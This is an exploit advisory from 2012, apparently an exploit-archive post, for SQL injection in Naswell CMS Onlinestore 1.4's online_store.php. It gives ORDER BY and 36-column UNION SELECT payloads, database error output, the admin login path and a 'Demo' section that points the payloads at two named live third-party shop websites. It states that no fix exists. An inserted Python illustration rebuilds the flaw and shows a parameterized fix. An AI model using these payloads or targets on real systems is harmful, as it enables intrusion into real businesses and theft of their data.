Naswell CMS Onlinestore Multiple Vulnerabilities

2012-09-18 08:32:35
Posted by: dementor

#######################################################################################
# Author: Mr.Dementor
# Exploit Title: Naswell CMS Onlinestore Multiple Vulnerabilities
# Date: 18-09-2012
# Vendor or Software Link: http://www.naswell.com.au/
# Category: WebApp
# Version: 1.4
# Type: Commercial
# Contact: [email protected]
# Website: http://www.magetan-it.org
# Greetings to:
# Best for : Handi Eko Saputro
# my Friends : tiaNG_jaWI , aSU_aBANG, Cybertaziex, Detol SevenCrew, De Vinclous, Dany Artha, BL4cKc0d1n6, Shadow Banditz.

########################################################################################

Exploit:

SQL Injection
-------------

Vulnerable file ===> online_store.php?idcategory=[id]
Injection ====> select, order, union, etc. [blind injection is more powerful against some targets]

PoC:

http://some.target/online_store.php?idcategory=-335+order+by+50--

Error result:

Erro Seleção: SELECT *, price AS original_price, if(length(image) > 0, true, false) as hasImage, IF(( (salesPrice > 0) AND (salesPrice < price) ), salesPrice, price) AS price, IF(( (salesPrice > 0) AND (salesPrice < price) ), TRUE, FALSE) AS on_sale FROM Product WHERE showWebsite = 1 AND active = 1 AND deleteDate IS NULL AND idCategory = -335 order by 50-- ORDER BY orderProd ASC, hasImage DESC, name ASC - Unknown column '50' in 'order clause'

Where the error allows it, a UNION can be used:

http://some.target/online_store.php?idcategory=335+union+all select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+and+1=1

Note: work out the column count first.
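As an added illustration (not part of this advisory and not Naswell's code, which is not shown here), the query shape visible in the error message above is rebuilt in Python against a constructed SQLite stand-in for the Product table: the concatenating version reproduces the ORDER BY failure, and the fixed version validates idcategory as an integer and binds it as a query parameter.

```python
import sqlite3

# Constructed stand-in for the Product table named in the error message above;
# columns are reduced to the ones the WHERE and ORDER BY clauses reference.
SCHEMA = """
CREATE TABLE Product (
    id INTEGER PRIMARY KEY, name TEXT, price REAL, idCategory INTEGER,
    showWebsite INTEGER, active INTEGER, deleteDate TEXT, orderProd INTEGER
);
INSERT INTO Product VALUES (1, 'kettle', 20.0, 335, 1, 1, NULL, 1);
INSERT INTO Product VALUES (2, 'pan',    35.0, 335, 1, 1, NULL, 2);
INSERT INTO Product VALUES (3, 'hidden',  5.0, 335, 0, 1, NULL, 3);
"""

def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def unsafe_query(idcategory: str) -> str:
    # The pattern the error message reveals: the raw GET value is spliced into
    # the statement text, so "-335 order by 50--" replaces the ORDER BY clause
    # and comments out the application's own ordering.
    return ("SELECT name FROM Product WHERE showWebsite = 1 AND active = 1 "
            "AND deleteDate IS NULL AND idCategory = " + idcategory +
            " ORDER BY orderProd ASC, name ASC")

def run_unsafe(conn, idcategory: str):
    """Execute the concatenated query; returns (True, rows) or (False, error text)."""
    try:
        return True, [r[0] for r in conn.execute(unsafe_query(idcategory))]
    except sqlite3.Error as exc:
        return False, str(exc)

def fetch_products_safe(conn, idcategory: str) -> list:
    """Hardened version: check the type, then bind the value as a parameter."""
    try:
        category = int(idcategory)      # idcategory is an integer id; nothing else is accepted
    except ValueError:
        raise ValueError("idcategory must be an integer") from None
    rows = conn.execute(
        "SELECT name FROM Product WHERE showWebsite = 1 AND active = 1 "
        "AND deleteDate IS NULL AND idCategory = ? "
        "ORDER BY orderProd ASC, name ASC",
        (category,),                    # bound by the driver, never interpolated into SQL text
    )
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = connect()
    print(run_unsafe(db, "-335 order by 50--"))   # ok is False: ORDER BY term out of range
    print(fetch_products_safe(db, "335"))          # ['kettle', 'pan']
```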

Path Disclosure
---------------
The admin login is found at https://some.target/admin/login.php

Enjoy this Demo :p

https://www.alkalinecookbook.com.au/online_store.php?idcategory=335+union+all select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+and+1=1

https://www.brenniston.com.au/online_store.php?idcategory=-335+order+by+50--

Science is more important than stolen CC (y) - Submitted by Mr.Dementor

Fixes

No fixes
